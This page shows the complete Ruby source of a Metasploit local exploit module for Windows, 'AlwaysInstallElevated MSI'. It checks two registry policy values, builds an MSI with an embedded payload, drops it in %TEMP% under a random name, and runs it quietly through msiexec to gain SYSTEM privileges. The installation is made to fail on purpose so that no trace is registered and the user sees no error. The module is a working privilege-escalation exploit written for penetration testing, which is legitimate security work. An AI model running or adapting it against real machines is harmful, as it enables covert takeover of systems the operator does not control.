Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/always_install_elevated.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::EXE

10
  include Msf::Exploit::FileDropper

11
  include Msf::Post::File

12
  include Msf::Post::Windows::Registry

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        {

19
          'Name' => 'Windows AlwaysInstallElevated MSI',

20
          'Description' => %q{

21
            This module checks the AlwaysInstallElevated registry keys which dictates if

22
            .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).

23
            The generated .MSI file has an embedded executable which is extracted and run

24
            by the installer. After execution the .MSI file intentionally fails installation

25
            (by calling some invalid VBS) to prevent it being registered on the system.

26
            By running this with the /quiet argument the error will not be seen by the user.

27
          },

28
          'License' => MSF_LICENSE,

29
          'Author' => [

30
            'Ben Campbell',

31
            'Parvez Anwar' # discovery?/inspiration

32
          ],

33
          'Arch' => [ ARCH_X86, ARCH_X64 ],

34
          'Platform' => [ 'win' ],

35
          'SessionTypes' => [ 'meterpreter' ],

36
          'DefaultOptions' => {

37
            'WfsDelay' => 10,

38
            'EXITFUNC' => 'process',

39
            'MSI::UAC' => true

40
          },

41
          'Targets' => [

42
            [ 'Windows', {} ],

43
          ],

44
          'References' => [

45
            [ 'URL', 'http://www.greyhathacker.net/?p=185' ],

46
            [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],

47
            [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']

48
          ],

49
          'DisclosureDate' => '2010-03-18',

50
          'DefaultTarget' => 0,

51
          'Notes' => {

52
            'Reliability' => UNKNOWN_RELIABILITY,

53
            'Stability' => UNKNOWN_STABILITY,

54
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
          }

56
        }

57
      )

58
    )

59


60
    register_advanced_options([

61
      OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),

62
      OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])

63
    ])

64
  end

65


66
  def check

67
    install_elevated = "AlwaysInstallElevated"

68
    installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"

69
    hkcu = "HKEY_CURRENT_USER\\#{installer}"

70
    hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

71


72
    local_machine_value = registry_getvaldata(hklm, install_elevated)

73


74
    if local_machine_value.nil?

75
      vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")

76
      return Msf::Exploit::CheckCode::Safe

77
    elsif local_machine_value == 0

78
      vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")

79
      return Msf::Exploit::CheckCode::Safe

80
    else

81
      vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")

82
      current_user_value = registry_getvaldata(hkcu, install_elevated)

83
    end

84


85
    if current_user_value.nil?

86
      vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")

87
      return Msf::Exploit::CheckCode::Safe

88
    elsif current_user_value == 0

89
      vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")

90
      return Msf::Exploit::CheckCode::Safe

91
    else

92
      vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")

93
      return Msf::Exploit::CheckCode::Vulnerable

94
    end

95
  end

96


97
  def exploit

98
    return unless check == Msf::Exploit::CheckCode::Vulnerable

99


100
    msi_filename = Rex::Text.rand_text_alpha((rand(8) + 6)) + ".msi"

101
    msi_source = generate_payload_msi

102


103
    # Upload MSI

104
    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip

105
    print_status("Uploading the MSI to #{msi_destination} ...")

106


107
    write_file(msi_destination, msi_source)

108
    register_file_for_cleanup(msi_destination)

109


110
    if datastore['LOG_FILE'].nil?

111
      logging = ""

112
    else

113
      logging = "/l* #{datastore['LOG_FILE']} "

114
    end

115


116
    if datastore['QUIET']

117
      quiet = "/quiet "

118
    else

119
      quiet = ""

120
    end

121


122
    cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"

123


124
    print_status("Executing MSI...")

125
    vprint_status("Executing: #{cmd}")

126
    begin

127
      result = cmd_exec(cmd)

128
    rescue Rex::TimeoutError

129
      vprint_status("Execution timed out.")

130
    end

131
    vprint_status("MSI command-line feedback: #{result}")

132
  end

133
end

134


135